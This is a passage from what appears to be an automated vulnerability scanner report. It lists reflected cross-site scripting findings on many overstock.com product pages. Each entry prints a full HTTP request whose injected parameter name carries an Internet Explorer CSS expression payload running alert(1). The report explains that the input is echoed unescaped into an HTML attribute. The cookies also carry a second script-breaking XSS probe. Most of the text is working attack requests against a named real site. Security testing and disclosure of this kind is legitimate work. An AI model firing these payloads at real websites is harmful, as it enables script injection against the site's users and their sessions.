GET /Home-Garden/Renaissance-600-Thread-Count-Cotton-Sheet-Sets/3937028/product.html?e124e"style%3d"x%3aexpression(alert(1))"9bbcde06c11=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b65"style%3d"x%3aexpression(alert(1))"1bc9a40efd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5b65"style="x:expression(alert(1))"1bc9a40efd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Renaissance-Quilt-Set/1680524/product.html?a5b65"style%3d"x%3aexpression(alert(1))"1bc9a40efd0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.337. http://www.overstock.com/Home-Garden/Restoration-Dark-Oil-Rubbed-Bronze-Centerset-Teapot-Faucet/3146916/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33bfd"style%3d"x%3aexpression(alert(1))"8ae0d1626af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33bfd"style="x:expression(alert(1))"8ae0d1626af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Restoration-Dark-Oil-Rubbed-Bronze-Centerset-Teapot-Faucet/3146916/product.html?33bfd"style%3d"x%3aexpression(alert(1))"8ae0d1626af=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.338. http://www.overstock.com/Home-Garden/Revello-7-piece-Comforter-Set/4359354/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2145f"style%3d"x%3aexpression(alert(1))"6c01682caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2145f"style="x:expression(alert(1))"6c01682caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Revello-7-piece-Comforter-Set/4359354/product.html?2145f"style%3d"x%3aexpression(alert(1))"6c01682caf=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.339. http://www.overstock.com/Home-Garden/Rita-Espresso-Side-Chair-Set-of-2/3068440/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a35"style%3d"x%3aexpression(alert(1))"0750d0cd1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1a35"style="x:expression(alert(1))"0750d0cd1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Rita-Espresso-Side-Chair-Set-of-2/3068440/product.html?b1a35"style%3d"x%3aexpression(alert(1))"0750d0cd1f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.340. http://www.overstock.com/Home-Garden/Roderick-Stevens-Music-Store-Unframed-Canvas-Art/3196523/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91235"style%3d"x%3aexpression(alert(1))"935b3d725a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91235"style="x:expression(alert(1))"935b3d725a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Roderick-Stevens-Music-Store-Unframed-Canvas-Art/3196523/product.html?91235"style%3d"x%3aexpression(alert(1))"935b3d725a9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.341. http://www.overstock.com/Home-Garden/Royal-Heritage-1200-Thread-Count-Sateen-Egyptian-Cotton-Sheet-Set/4662758/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a13a"style%3d"x%3aexpression(alert(1))"3f19d93eff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a13a"style="x:expression(alert(1))"3f19d93eff7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Royal-Heritage-1200-Thread-Count-Sateen-Egyptian-Cotton-Sheet-Set/4662758/product.html?8a13a"style%3d"x%3aexpression(alert(1))"3f19d93eff7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.342. http://www.overstock.com/Home-Garden/Royal-Velvet-250-Thread-Count-Down-Alternative-Blanket/4365615/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901c9"style%3d"x%3aexpression(alert(1))"d60dd3fb664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 901c9"style="x:expression(alert(1))"d60dd3fb664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Royal-Velvet-250-Thread-Count-Down-Alternative-Blanket/4365615/product.html?901c9"style%3d"x%3aexpression(alert(1))"d60dd3fb664=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.343. http://www.overstock.com/Home-Garden/Royal-Velvet-250-Thread-Count-White-Down-Blanket/4365632/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd14d"style%3d"x%3aexpression(alert(1))"0f34feae65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd14d"style="x:expression(alert(1))"0f34feae65a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Royal-Velvet-250-Thread-Count-White-Down-Blanket/4365632/product.html?bd14d"style%3d"x%3aexpression(alert(1))"0f34feae65a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.344. http://www.overstock.com/Home-Garden/Saddle-Seat-24-inch-Counter-Stools-Set-of-2/2041509/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7877"style%3d"x%3aexpression(alert(1))"7720e226d1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7877"style="x:expression(alert(1))"7720e226d1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Saddle-Seat-24-inch-Counter-Stools-Set-of-2/2041509/product.html?b7877"style%3d"x%3aexpression(alert(1))"7720e226d1e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.345. http://www.overstock.com/Home-Garden/Sateen-1000-Thread-Count-4-piece-Sheet-Set/3671323/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d31e"style%3d"x%3aexpression(alert(1))"2a0c16e12bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d31e"style="x:expression(alert(1))"2a0c16e12bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Sateen-1000-Thread-Count-4-piece-Sheet-Set/3671323/product.html?8d31e"style%3d"x%3aexpression(alert(1))"2a0c16e12bd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.346. http://www.overstock.com/Home-Garden/Serta-4-inch-Memory-Foam-Mattress-Topper-with-Contour-Pillows/2653504/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb17"style%3d"x%3aexpression(alert(1))"95c47ce3c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1cb17"style="x:expression(alert(1))"95c47ce3c34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-4-inch-Memory-Foam-Mattress-Topper-with-Contour-Pillows/2653504/product.html?1cb17"style%3d"x%3aexpression(alert(1))"95c47ce3c34=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.347. http://www.overstock.com/Home-Garden/Serta-4-inch-Restoration-Memory-Foam-Mattress-Topper/5035939/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609d1"style%3d"x%3aexpression(alert(1))"9c0985f8ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 609d1"style="x:expression(alert(1))"9c0985f8ce6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-4-inch-Restoration-Memory-Foam-Mattress-Topper/5035939/product.html?609d1"style%3d"x%3aexpression(alert(1))"9c0985f8ce6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.348. http://www.overstock.com/Home-Garden/Serta-8-inch-Full-size-Memory-Foam-Mattress-and-Cover-Set/4107276/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331fa"style%3d"x%3aexpression(alert(1))"3d165defb8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 331fa"style="x:expression(alert(1))"3d165defb8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Serta-8-inch-Full-size-Memory-Foam-Mattress-and-Cover-Set/4107276/product.html?331fa"style%3d"x%3aexpression(alert(1))"3d165defb8d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.349. http://www.overstock.com/Home-Garden/Serta-8-inch-Queen-size-Memory-Foam-Mattress-and-Cover-Set/4107277/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9bd8"style%3d"x%3aexpression(alert(1))"88c65efcc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9bd8"style="x:expression(alert(1))"88c65efcc58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
